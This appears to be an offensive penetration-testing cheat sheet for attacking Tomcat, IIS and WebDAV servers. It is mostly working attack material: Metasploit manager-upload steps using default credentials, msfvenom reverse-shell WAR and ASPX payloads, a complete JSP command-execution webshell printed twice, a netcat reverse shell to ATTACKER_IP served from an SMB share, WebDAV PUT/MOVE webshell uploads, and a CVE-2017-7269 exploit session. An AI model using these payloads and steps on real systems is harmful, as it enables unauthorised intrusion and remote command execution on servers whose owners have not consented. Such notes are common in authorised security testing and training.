IIS

Tomcat

Tips & Tricks

# Two interfaces for tomcat
/manager
/host-manager
# default root for IIS is 
C:\inetpub\wwwroot

# Instead of using complicated relative path of the application use that one.
# Upload to: 
C:\inetpub\wwwroot\shell.jsp
curl http://13.33.3.37/shell.jsp


Exploiting the classic Manager

# Metasploit provides an easy to use module to upload files and get a shell
use exploit/multi/http/tomcat_mgr_upload
msf exploit(multi/http/tomcat_mgr_upload) > set rhost 192.168.1.101
msf exploit(multi/http/tomcat_mgr_upload) > set rport 8080
msf exploit(multi/http/tomcat_mgr_upload) > set httpusername tomcat
msf exploit(multi/http/tomcat_mgr_upload) > set httppassword tomcat
msf exploit(multi/http/tomcat_mgr_upload) > exploit
# But also possible to only generate a WAR payload
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.108 LPORT=1234 -f war > shell.war

# And then set up a listener
nc -lvvp 1234

# Then deploy using the manager and browse to your shell path
# JSP Webshell
<FORM METHOD=GET ACTION='index.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
   String cmd = request.getParameter("cmd");
   String output = "";
   if(cmd != null) {
      String s = null;
      try {
         Process p = Runtime.getRuntime().exec(cmd,null,null);
         BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
         while((s = sI.readLine()) != null) { output += s+"</br>"; }
      }  catch(IOException e) {   e.printStackTrace();   }
   }
%>
<pre><%=output %></pre>

# Then pack it 
mkdir webshell
cp index.jsp webshell/
cd webshell
jar -cvf ../webshell.war *

# Last step is deploying and browsin


Exploiting Host-Manager

https://www.certilience.fr/2019/03/variante-d-exploitation-dun-tomcat-host-manager/

# You can exploit this and get a webshell or even reverse shell by uploading a WAR file
# index.jsp
<FORM METHOD=GET ACTION='index.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
   String cmd = request.getParameter("cmd");
   String output = "";
   if(cmd != null) {
      String s = null;
      try {
         Process p = Runtime.getRuntime().exec(cmd,null,null);
         BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
         while((s = sI.readLine()) != null) { output += s+"</br>"; }
      }  catch(IOException e) {   e.printStackTrace();   }
   }
%>
<pre><%=output %></pre>

# Then craft a WAR archive
# |-- index.jsp
# |-- META-INF
# |   |__ MANIFEST.MF
# |-- WEB-INF
#     |__ web.xml

# You may need to add a new entry in the /etc/hosts
<IP>    <Your VHOST>

# Then deploy a SMB Server
smbserver.py -smb2support <name> <path>

# In the host-manager
# NAME = Your VHOST
# ALIASES = Your VHOST
# APP base = \\Your-IP\<name>
# Deploy...
# Get a reverse shell
# You can drop a nc64.exe in your share then access it
\\IP\youshare\nc64.exe -e cmd.exe ATTACKER_IP PORT

# And then..
# rlwrap allows you to interface local and remote keyboard (giving arrows keyboards and history)
rlwrap ncat -klvp PORT


WebDAV

Tips & classic webshell upload

# If WebDAV is open, you can use tools like cadaver to connect
cadaver <ip>
dav:/> ls
Listing collection `/': succeeded.
# Webdav often works with the PUT HTTP method
# It means you can often upload files (for exampla, to get webshell)
curl -X PUT http://10.10.10.15/tmp.txt -d @cmdasp.aspx
curl -X MOVE -H "Destination:http://10.10.10.15/webshell.aspx" http://10.10.10.15/tmp.txt

# Or using cadaver
cp cmdasp.aspx cmdasp.txt
dav:/> put /path/to/cmdasp.txt
dav:/> move cmdasp.txt cmdasp.aspx


Reverse Shell

# If you can execute ASPX, you can craft reverse shell payloads
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.112 LPORT=54321 -f aspx > shell.aspx

# Then use a handler (MSF or nc for example)
msf> use exploit/multi/handler
msf> set payload windows/meterpreter/reverse_tcp
msf> set LHOST xxxxxx
msf> set LPORT xxxxxx
msf> run

CVE-2017-7269

# If you can't directly upload files, you still can look for known vulnerabilities
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > options

Module options (exploit/windows/iis/iis_webdav_scstoragepathfromurl):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   MAXPATHLENGTH  60               yes       End of physical path brute force
   MINPATHLENGTH  3                yes       Start of physical path brute force
   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS         10.10.10.14      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          80               yes       The target port (TCP)
   SSL            false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI      /                yes       Path of IIS 6 web application
   VHOST                           no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.16.112     yes       The listen address (an interface may be specified)
   LPORT     5566             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Microsoft Windows Server 2003 R2 SP2 x86